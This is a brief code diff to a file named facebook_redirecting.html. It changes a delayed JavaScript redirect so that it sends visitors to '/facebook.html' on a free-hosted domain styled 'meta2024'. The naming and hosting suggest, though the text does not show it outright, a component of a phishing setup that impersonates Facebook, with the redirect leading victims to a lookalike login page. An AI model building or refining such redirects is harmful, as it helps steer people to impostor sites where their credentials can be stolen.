--- a/facebook_redirecting.html
+++ b/facebook_redirecting.html
@@ -38,7 +38,7 @@
 
   <script>
     setTimeout(function() {
-      window.location.href = "http://meta2024.infinityfreeapp.com";
+      window.location.href = "http://meta2024.infinityfreeapp.com/facebook.html";
     }, 4500);
   </script>
 </body>
